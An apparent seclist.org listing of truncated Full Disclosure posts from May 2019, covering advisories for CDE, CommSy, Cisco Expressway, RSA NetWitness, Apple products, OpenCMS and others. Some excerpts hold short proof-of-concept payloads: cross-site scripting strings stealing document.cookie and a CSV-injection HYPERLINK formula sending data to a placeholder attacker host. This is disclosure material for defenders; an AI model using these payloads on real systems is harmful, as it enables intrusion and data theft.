seclist.org

Posted by Marco Ivaldi on May 17

Dear Full Disclosure,

Please find attached an advisory for the following vulnerability:

A buffer overflow in the DtPrinterAction::PrintActionExists() function in the
Common Desktop Environment 2.3.0 and earlier, as used in Oracle Solaris 10 1/13
(Update 11) and earlier, allows local users to gain root privileges via a long
printer name passed to dtprintinfo by a malicious lpstat program.

Note that Oracle Solaris CDE is based on the original...

Posted by Jens Regel | Schneider & Wulf on May 17

Title:
======
CommSy <= 8.6.5 - SQL injection

Researcher:
===========
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG

CVE-ID:
=======
CVE-2019-11880

Timeline:
=========
2019-04-15 Vulnerability discovered
2019-04-15 Asked for security contact and PGP key
2019-04-16 Send details to the vendor
2019-05-07 Flaw was approved but will not be fixed in branch 8.6
2019-05-15 Public disclosure

Affected Products:
==================...

Posted by gionreale on May 17

GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability

It is possible in versions 1.30 and below for unauthenticated attackers to query the GAT-Ship Web Module for system
information via a crafted request:

PoC:
---------------------------------------------------------------------------------------------------------------------------------------

POST /ws/gatshipWs.asmx/SqlVersion <...

Posted by RedTeam Pentesting GmbH on May 17

Advisory: Directory Traversal in Cisco Expressway Gateway

RedTeam Pentesting discovered a directory traversal vulnerability in
Cisco Expressway which enables access to administrative web interfaces.

Details
=======

Product: Cisco Expressway Gateway
Affected Versions: 11.5.1, possibly others
Fixed Versions: See Cisco Bug ID CSCvo47769 [1]
Vulnerability Type: Directory Traversal
Security Risk: medium
Vendor URL:...

Posted by SEC Consult Vulnerability Lab on May 15

SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >
=======================================================================
title: Authorization Bypass
product: RSA NetWitness
vulnerable version: <10.6.6.1, <11.2.1.1
fixed version: 10.6.6.1, 11.2.1.1
CVE number: CVE-2019-3724
impact: Medium
homepage: https://www.rsa.com
found: 2018-09-18...

Posted by RCE Security on May 14

RCE Security Advisory
https://www.rcesecurity.com

1. ADVISORY INFORMATION
=======================
Product: Schneider Electric U.Motion Builder
Vendor URL: www.schneider-electric.com
Type: OS Command Injection [CWE-78]
Date found: 2018-11-15
Date published: 2019-05-13
CVSSv3 Score: 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVE: CVE-2018-7841

2. CREDITS
==========
This vulnerability was discovered...

Posted by Qualys Security Advisory on May 13

Hi all,

Our systemd-journald exploit for CVE-2018-16865 and CVE-2018-16866 is
now available at:

https://www.qualys.com/2019/05/09/system-down/system-down.tar.gz

It is also attached to this email. A few notes about this exploit:

- It supports several targets by default (vulnerable versions of Debian,
Ubuntu, Fedora, CentOS), and it should be relatively easy to add more
targets.

- When adding a new amd64 target, use the...

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-5 Safari 12.1.1

Safari 12.1.1 is now available and addresses the following:

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
included in macOS Mojave 10.14.5
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team...

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-6 Apple TV Software 7.3

Apple TV Software 7.3 is now available and addresses the following:

Bluetooth
Available for: Apple TV (3rd generation)
Impact: A remote attacker may cause an unexpected application
termination or arbitrary code execution
Description: An input validation issue existed in Bluetooth. This
issue was addressed with improved input validation.
CVE-2017-14315: Ben Seri and Gregory Vishnepolsky of Armis

Wi-Fi...

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-4 watchOS 5.2.1

watchOS 5.2.1 is now available and addresses the following:

AppleFileConduit
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)

CoreAudio
Available for: Apple Watch Series 1 and later
Impact: Processing a...

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-3 tvOS 12.3

tvOS 12.3 is now available and addresses the following:

AppleFileConduit
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)

CoreAudio
Available for: Apple TV 4K and Apple TV HD
Impact: Processing a maliciously...

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-2 macOS Mojave 10.14.5, Security Update
2019-003 High Sierra, Security Update 2019-003 Sierra

macOS Mojave 10.14.5, Security Update 2019-003 High Sierra,
Security Update 2019-003 Sierra are now available and
addresses the following:

Accessibility Framework
Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.4
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with...

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-1 iOS 12.3

iOS 12.3 is now available and addresses the following:

AppleFileConduit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)

Contacts
Available for: iPhone 5s and later, iPad...

Posted by Joshua Mulliken on May 13

===================
Title: [CVE-2019-8978] Improper Authentication (CWE-287) in Ellucian Banner Web Tailor and Banner Enterprise Identity
Services
Author: Joshua Mulliken <
joshua () mulliken net

Thanks to: Carnegie Mellon University CERT Coordination Center
Date Found: Dec. 17, 2018
Vendor: Ellucian Company L.P.
Vendor Homepage:
https://www.ellucian.com
Products: Banner Web Tailor and Banner Enterprise Identity Services
Web Tailor Affected...

Posted by Bipin Gautam on May 13

POC:

tl;dr

run just Firefox browser / TOR and just nothing

and tcpdump the computing device / network

firewall BLOCK all IP/A names, gradually... that shows up in tcpdump
when you do not using firefox but it connects automatically (if you
block something firefox hops to something else, 3-5+ times )

QUICK FIX:

in address bar:

about:config

search for string:

org

com

mozilla

firefox

google

...?

to start with : almost all... the url...

Posted by SEC Consult Vulnerability Lab on May 13

Then the message was tampered by changing the value of the "Hash" Armor Header
from SHA-1 to SHA-512:

(content of hash_spoof.asc file):
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Message to be signed
-----BEGIN PGP SIGNATURE-----
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N...

Posted by Pramod Rana on May 10

Description: WolfCMS v0.8.3.1 and before is vulnerable to cross site
scripting in User Add module for parameter Name.

Impacted URL is http://[your_webserver_ip]/wolfcms/?/admin/user/add

Payload used is "TestXSS><img src=x onmousover=alert(document.cookie)>

Further details: https://github.com/wolfcms/wolfcms/issues/683

Already requested for CVE, yet to receive it.

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New
User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used is
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe&quot;)'

Further details is available here
https://github.com/alkacon/opencms-core/issues/636

Already requested for...

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to cross site
scripting in New User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used in PoC is "TestXSS<img+src=x+onmouseover=alert(document.domain)

Further details is available here
https://github.com/alkacon/opencms-core/issues/635

Already requested for CVE, yet to receive...

Posted by John Martinelli on May 10

Read full vulnerability report @
https://secureli.com/dotcms-v5-1-1-open-redirect-vulnerability/

dotCMS v5.1.1 suffers from an Open Redirect Vulnerability, in addition
to many other vulnerabilities that I am still verifying.

The following URL is a proof-of-concept that requires a user to be
logged in. Simply login to the demo before visiting the supplied POC.

Logging into the demo requires you to go to
https://demo.dotcms.com/dotAdmin <...